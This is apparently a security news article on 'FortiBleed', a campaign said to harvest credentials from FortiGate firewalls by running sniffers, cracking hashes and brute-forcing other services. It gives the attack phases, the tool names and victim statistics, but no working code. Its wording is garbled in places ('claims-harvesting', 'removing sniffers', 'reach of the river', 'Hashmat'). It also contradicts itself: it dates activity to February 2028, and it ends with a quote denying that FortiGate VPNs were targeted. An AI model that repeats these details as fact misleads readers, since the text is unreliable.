FortiBleed Targeted FortiGate Firewall in 110 Million-Credential Harvesting Operation
A Russian-speaking initial access broker (IAB) driven by financial gain is being investigated as the cause of a massive claims-harvesting operation known as FortiBleed which controls more than 430,000 FortiGate firewalls worldwide.
The campaign, which went into effect from February 2026, includes collecting authentication lists, searching for exposed resources, accessible brute-force systems, and removing sniffers from vulnerable firewalls.
“Once deployed, these sensors capture clear text and instant information from traffic passing through compromised devices,” SOCRadar said. [PDF] in a new report. “The actors then crack, verify, and reuse credentials against Active Directory domains and other exposed services.”
Essential to the functionality is a Golang-based tool called FortigateSniffer that uses FortiOS’s built-in -diagnose sniffer packet to passively capture authentication traffic from infected machines. The tool is designed to monitor traffic across 24 protocols, analyze authentication data, and extract insights.
It is suspected that threat actors may seek the help of a native AI offensive security platform called CyberStrike to assist with “certain aspects of the workflow.” Interestingly, another open source framework called CyberStrikeAI was used in connection with another major scanning campaign targeting FortiGate devices that Amazon Threat Intelligence revealed earlier this year.
“The campaign shows a strong focus on small and medium-sized businesses (SMBs) with fewer than 200 employees,” SOcradar explained. “The actor targets many sectors and regions, with a significant emphasis on the United States and India. The IT services sector seems to be the main target. This choice of targeting probably helps the actor to increase the reach of the river, as the service providers involved can create ways to reach the customer’s areas.”
Perhaps the most interesting finding is that FortiBleed appears to be part of the first comprehensive, multi-vendor program planned to not only target Fortinet devices, but also breach Synology NAS, Sophos firewalls, RDWeb portals, Citrix SSL-VPNs, and MS-SQL servers using automated brute-forcing starting in February 2028, .
In total, attackers are estimated to have launched no fewer than 659 piecemeal harvesting pipelines between May 31 and June 15, 2026, resulting in the identification of more than 110 million pieces of information. This includes –
- 14.8 million Remote Authentication Dial-In User Service (RADIUS) credentials
- 924,000 NTLM hashes
- 130,000 Kerberos hashes
- 89 million MySQL authentication tokens
The FortiBleed campaign takes place in five phases –
- Perform a widespread scan using tools such as Masscan and Shodan to identify vulnerable Internet-facing FortiGate firewalls, followed by using a custom utility called FortiProbe-fast and GeoSplit to filter FortiGate systems and group them by country, respectively.
- Compromise devices with an authentication checker called “forticheck” that specifically targets the FortiGate control panel and the SSL-VPN portal, as well as using SSH access control tools for rooting credentials and dictionary attacks.
- When establishing access via SSH, FortigateSniffer is used to intercept traffic authentication across 24 protocols (eg, TACACS+, Kerberos, RPC, SMB, LDAP, SMTP, FTP, Telnet, RDP, WinRM, MS-SQL, MySQL, PostgreSQL, PostgreSQL, and RADIUS). hash.
- Password hashes are cracked using Hashmat and Hashtopolis, and compiled by a Telegram bot called HASHBOT, after which they are used for cross-movement and active directory enumeration.
- Sensitive data from network shares is extracted while time-stamped cookies are used to maintain persistent, authenticated access.
“The group does not treat all targets equally,” SOcradar said. “Instead, targets are calculated in terms of economic value before exploitation resources are allocated.”
In addition, the sniffing method includes a geofencing filter that restricts activity to a certain IP range, not to mention restricting activity between 7am and 6pm Moscow Time. According to data obtained by SpyCloud, the cycle of FortiGate-related captures is said to have started on May 19, 2026, and the hash cracking infrastructure was stopped at the end of the month.
“This work runs in 300-minute (five-hour) cycles, with an event every minute,” Zenox said. “In each cycle it loads the target region list […] and authenticates with 1,000 threads at once, displays counters for success, failure, timeout, and warnings. In the first cycles, the successful verification rate increased to close to 90%.
The Brazilian cybersecurity company also said it found a specific username and password pair to be repeated across thousands of different IP addresses, suggesting the accounts may have been planted by the attacker as a secret back-end entry point.
The upgrade comes as a Russian-speaking account called “SantaAd” advertised access to thousands of Fortinet devices at an initial price of $30,000, before increasing it to $60,000 hours later. However, it is unclear whether this has any connection to FortiBleed exposure.
“The group of malicious actors behind ‘FortiBleed’ did not target FortiGate VPNs,” SpyCloud said. “They were actually targeting a range of different cyber-facing machines with a typical network of spray-and-pray attacks that rely heavily on mass scanning and brute force penetration.”
